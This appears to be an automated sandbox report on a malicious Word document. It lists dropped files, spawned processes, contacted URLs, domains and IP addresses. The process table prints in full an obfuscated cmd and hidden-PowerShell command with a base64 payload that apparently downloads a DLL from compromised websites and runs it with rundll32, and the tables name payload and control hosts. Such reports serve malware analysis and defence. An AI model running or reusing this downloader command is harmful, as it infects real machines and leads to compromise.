Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ARCHIVOFile-20-012021.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: -535, Keywords: 155, Comments: 43,
Thumbnail: 21890, 0x17: 917504CDFV2 Microsoft Word
|
initial sample
|
||
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 59134 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76E1ED2-1DC6-41B5-9D5C-624688043260}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Cab479B.tmp
|
Microsoft Cabinet archive data, 59134 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Tar479C.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCHIVOFile-20-012021.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12
2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 19:17:33 2021, length=163328, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1JTN6F3VHEJQWGEUZSLB.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
|
data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA=
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA=
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://norailya.com/drupal/retAl/
|
unknown
|
||
https://ummahstars.com
|
unknown
|
||
https://hbprivileged.comh
|
unknown
|
||
https://hbprivileged.com
|
unknown
|
||
https://norailya.com
|
unknown
|
||
https://mrveggy.com/wp-admin/n/
|
unknown
|
||
https://www.teelekded.com/cgi-bin/LPo/
|
unknown
|
||
http://riandutra.com/email/AfhE8z0/
|
191.6.196.95
|
||
http://calledtochange.org/CalledtoChange/8huSOd/
|
75.103.81.81
|
||
https://ummahstars.com/app_old_may_2018/assets/wDL8x/
|
unknown
|
||
http://riandutra.com
|
unknown
|
||
https://mrveggy.com
|
unknown
|
||
https://hbprivileged.com/cgi-bin/Qg/
|
unknown
|
||
https://www.teelekded.com/cgi-bin/LPo/P
|
unknown
|
||
http://calledtochange.org
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://certificates.godaddy.com/repository/0
|
unknown
|
||
http://crl.use
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://www.litespeedtech.com
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://r3.o.lencr.org0
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://certificates.godaddy.com/repository/gdig2.crt0
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://servername/isapibackend.dll
|
unknown
|
||
http://cps.root-x1.letsencrypt.org0
|
unknown
|
||
http://r3.i.lencr.org/0%
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://cps.letsencrypt.org0
|
unknown
|
||
http://certs.godaddy.com/repository/1301
|
unknown
|
||
https://certs.godaddy.com/repository/0
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://crl.godaddy.com/gdroot-g2.crl0F
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://r3.o.lencr.o
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
http://crl.godaddy.com/gdig2s1-1814.crl0
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://crl.godaddy.com/gdroot.crl0F
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 44 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
hbprivileged.com
|
35.209.96.32
|
||
mrveggy.com
|
177.12.170.95
|
||
ummahstars.com
|
35.163.191.195
|
||
riandutra.com
|
191.6.196.95
|
||
calledtochange.org
|
75.103.81.81
|
||
norailya.com
|
104.168.154.203
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
200.75.39.254:80
|
unknown
|
unknown
|
unknown
|
||
192.175.111.212:7080
|
unknown
|
unknown
|
unknown
|
||
191.6.196.95
|
unknown
|
Brazil
|
unknown
|
||
91.233.197.70:80
|
unknown
|
unknown
|
unknown
|
||
93.149.120.214:80
|
unknown
|
unknown
|
unknown
|
||
212.71.237.140:8080
|
unknown
|
unknown
|
unknown
|
||
93.146.143.191:80
|
unknown
|
unknown
|
unknown
|
||
75.103.81.81
|
unknown
|
United States
|
unknown
|
||
181.30.61.163:443
|
unknown
|
unknown
|
unknown
|
||
46.101.58.37:8080
|
unknown
|
unknown
|
unknown
|
||
206.189.232.2:8080
|
unknown
|
unknown
|
unknown
|
